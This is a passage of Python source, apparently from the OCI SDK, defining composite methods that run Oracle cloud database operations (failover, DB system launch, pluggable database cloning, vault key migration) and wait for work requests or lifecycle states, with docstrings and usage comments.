A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_pluggable_database_operations_insights(external_pluggable_database_id, enable_external_pluggable_database_operations_insights_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def fail_over_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.fail_over_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def fail_over_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.fail_over_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
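When ``work_request_states`` is empty or omitted, the work-request variants fall back to the terminal statuses before lower-casing. A self-contained sketch of that defaulting (the local constant mirrors the SDK's private ``oci.waiter._WORK_REQUEST_TERMINATION_STATES``; it is defined here only for illustration):

```python
# Illustrative local stand-in for oci.waiter._WORK_REQUEST_TERMINATION_STATES.
WORK_REQUEST_TERMINATION_STATES = ['SUCCEEDED', 'FAILED', 'CANCELED']

def resolve_states(work_request_states=None):
    # Both None and [] fall back to the terminal statuses, matching the
    # ``states if states else default`` pattern used in the methods above.
    states = work_request_states if work_request_states else WORK_REQUEST_TERMINATION_STATES
    return [w.lower() for w in states]

print(resolve_states())              # ['succeeded', 'failed', 'canceled']
print(resolve_states(['ACCEPTED']))  # ['accepted']
```

This is why passing an empty list behaves the same as passing nothing at all.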
def failover_autonomous_container_database_dataguard_association_and_wait_for_work_request(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def failover_autonomous_container_database_dataguard_association_and_wait_for_state(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database_dataguard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def failover_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, failover_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_data_guard_association` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.FailoverDataGuardAssociationDetails failover_data_guard_association_details: (required)
A request to perform a failover, transitioning a standby database into a primary database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_data_guard_association(database_id, data_guard_association_id, failover_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def failover_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, failover_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.FailoverDataGuardAssociationDetails failover_data_guard_association_details: (required)
A request to perform a failover, transitioning a standby database into a primary database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_data_guard_association(database_id, data_guard_association_id, failover_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_autonomous_exadata_infrastructure_and_wait_for_work_request(self, launch_autonomous_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param oci.database.models.LaunchAutonomousExadataInfrastructureDetails launch_autonomous_exadata_infrastructure_details: (required)
Request to create an Autonomous Exadata Infrastructure resource.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_autonomous_exadata_infrastructure(launch_autonomous_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_autonomous_exadata_infrastructure_and_wait_for_state(self, launch_autonomous_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.AutonomousExadataInfrastructure` acted upon
to enter the given state(s).
:param oci.database.models.LaunchAutonomousExadataInfrastructureDetails launch_autonomous_exadata_infrastructure_details: (required)
Request to create an Autonomous Exadata Infrastructure resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_autonomous_exadata_infrastructure(launch_autonomous_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_db_system_and_wait_for_work_request(self, launch_db_system_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_db_system` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param oci.database.models.LaunchDbSystemBase launch_db_system_details: (required)
Request to launch a DB system.
**Note:** Deprecated for Exadata Cloud Service systems. Use the `new resource model APIs`__ instead.
For Exadata Cloud Service instances, support for this API will end on May 15th, 2021. See `Switching an Exadata DB System to the New Resource Model and APIs`__ for details on converting existing Exadata DB systems to the new resource model.
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model_conversion
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_db_system(launch_db_system_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_db_system_and_wait_for_state(self, launch_db_system_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_db_system` and waits for the :py:class:`~oci.database.models.DbSystem` acted upon
to enter the given state(s).
:param oci.database.models.LaunchDbSystemBase launch_db_system_details: (required)
Request to launch a DB system.
**Note:** Deprecated for Exadata Cloud Service systems. Use the `new resource model APIs`__ instead.
For Exadata Cloud Service instances, support for this API will end on May 15th, 2021. See `Switching an Exadata DB System to the New Resource Model and APIs`__ for details on converting existing Exadata DB systems to the new resource model.
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model_conversion
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbSystem.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_db_system(launch_db_system_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_system(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
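# Usage sketch (illustrative comment, not part of the generated client): a
# caller can combine the launch call and the lifecycle-state wait in one step.
# The config loading below and the LIFECYCLE_STATE_AVAILABLE target are
# assumptions about the caller's environment, not requirements of this method.
#
#     config = oci.config.from_file()
#     composite = oci.database.DatabaseClientCompositeOperations(
#         oci.database.DatabaseClient(config))
#     result = composite.launch_db_system_and_wait_for_state(
#         launch_details,  # an oci.database.models.LaunchDbSystemBase subclass
#         wait_for_states=[oci.database.models.DbSystem.LIFECYCLE_STATE_AVAILABLE],
#         waiter_kwargs={'max_interval_seconds': 30, 'max_wait_seconds': 3600})
#     db_system = result.data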
def local_clone_pluggable_database_and_wait_for_work_request(self, local_clone_pluggable_database_details, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param oci.database.models.LocalClonePluggableDatabaseDetails local_clone_pluggable_database_details: (required)
Request to clone a pluggable database locally.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.local_clone_pluggable_database(local_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def local_clone_pluggable_database_and_wait_for_state(self, local_clone_pluggable_database_details, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.LocalClonePluggableDatabaseDetails local_clone_pluggable_database_details: (required)
Request to clone a pluggable database locally.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.local_clone_pluggable_database(local_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
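# Note on waiter tuning (illustrative comment): both composite variants forward
# waiter_kwargs straight to oci.wait_until, so polling can be tightened for a
# short-lived operation such as a local PDB clone. The interval and timeout
# values below are example numbers, not SDK defaults; `composite`,
# `clone_details` and `pluggable_database_id` are assumed caller-side names.
#
#     composite.local_clone_pluggable_database_and_wait_for_state(
#         clone_details, pluggable_database_id,
#         wait_for_states=[oci.database.models.PluggableDatabase.LIFECYCLE_STATE_AVAILABLE],
#         waiter_kwargs={'max_interval_seconds': 10, 'max_wait_seconds': 600})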
def migrate_exadata_db_system_resource_model_and_wait_for_work_request(self, db_system_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.migrate_exadata_db_system_resource_model` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.migrate_exadata_db_system_resource_model`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.migrate_exadata_db_system_resource_model(db_system_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def migrate_vault_key_and_wait_for_work_request(self, database_id, migrate_vault_key_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.migrate_vault_key` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.MigrateVaultKeyDetails migrate_vault_key_details: (required)
Request to change the source of the encryption key for the database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.migrate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.migrate_vault_key(database_id, migrate_vault_key_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
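# Usage sketch for the work-request variants (illustrative comment): when no
# work_request_states are supplied, the waiter falls back to the terminal
# states SUCCEEDED/FAILED/CANCELED, so callers typically just inspect the
# final status. `composite`, `database_id` and `migrate_details` are assumed
# to exist in the caller's scope.
#
#     wr_result = composite.migrate_vault_key_and_wait_for_work_request(
#         database_id, migrate_details)
#     if wr_result.data.status != 'SUCCEEDED':
#         raise RuntimeError('key migration did not succeed: %s' % wr_result.data.status)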
def migrate_vault_key_and_wait_for_state(self, database_id, migrate_vault_key_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.migrate_vault_key` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.MigrateVaultKeyDetails migrate_vault_key_details: (required)
Request to change the source of the encryption key for the database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.migrate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.migrate_vault_key(database_id, migrate_vault_key_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def modify_database_management_and_wait_for_work_request(self, database_id, modify_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.modify_database_management` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ModifyDatabaseManagementDetails modify_database_management_details: (required)
The data to update one or more attributes of the Database Management Service for the database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.modify_database_management`
